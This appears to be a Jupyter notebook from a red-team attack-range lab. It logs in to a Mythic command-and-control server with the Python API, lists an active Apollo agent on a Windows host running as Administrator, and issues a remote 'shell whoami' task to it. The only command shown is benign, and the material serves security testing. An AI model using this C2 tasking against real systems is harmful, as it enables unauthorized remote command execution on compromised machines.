# Mythic API Testing

In [16]:
!pip install pandas mythic
from mythic import mythic
import pandas as pd

In [36]:
mythic_instance = await mythic.login(
    username="mythic_admin",
    password="mythic_password",
    server_ip="10.0.1.21",
    server_port=8443,
    timeout=-1
)
if mythic_instance: print(f"[+] Connected to Mythic!")

target_host = "AR-WIN-2"
target_agent = "apollo"
target_domain = "ATTACKRANGE"

command_name = "shell"
command_parameters = "whoami"

[+] Connected to Mythic!


## Listing Agents

In [38]:
callbacks = await mythic.get_all_active_callbacks(mythic=mythic_instance)
attack_range_agents = [c for c in callbacks if c['domain'].upper() == target_domain.upper()]
print(f"[+] Found {len(attack_range_agents)} {target_domain} agents")
pd.DataFrame(callbacks)

[+] Found 1 ATTACKRANGE agents


,architecture,description,domain,external_ip,host,id,display_id,integrity_level,ip,extra_info,sleep_info,pid,os,user,agent_callback_id,operation_id,process_name,payload
0,x64,Created by mythic_admin at 2024-06-22 11:32:45 Z,ATTACKRANGE,,AR-WIN-2,2,2,3,"[""10.0.1.15""]",,,4060,Windows Server 2019 Datacenter 1809 6.2.9200.0,Administrator,f7fd5569-aec4-4533-826f-308fd26f21d0,1,agpt,"{'os': 'Windows', 'payloadtype': {'name': 'apo..."


In [40]:
hosts = [c for c in attack_range_agents \
    if c['host'].upper() == target_host.upper() and \
    c['payload']['payloadtype']['name']== target_agent
]
if not hosts:
    raise Exception(f"[-] Could not find {target_host} agent")

agent_id = hosts[0]['display_id']
print(f"[+] Found {{target_host}} agent with Callback Display ID: {agent_id}")

[+] Found {target_host} agent with Callback Display ID: 2


## Executing a Command

In [41]:
output = await mythic.issue_task_and_waitfor_task_output(
    mythic=mythic_instance,
    command_name=command_name,
    parameters=command_parameters,
    callback_display_id=agent_id,
    timeout=60,
)
print(f"[+] Command output:\n{output.decode()}")

[+] Command output:
attackrange\administrator

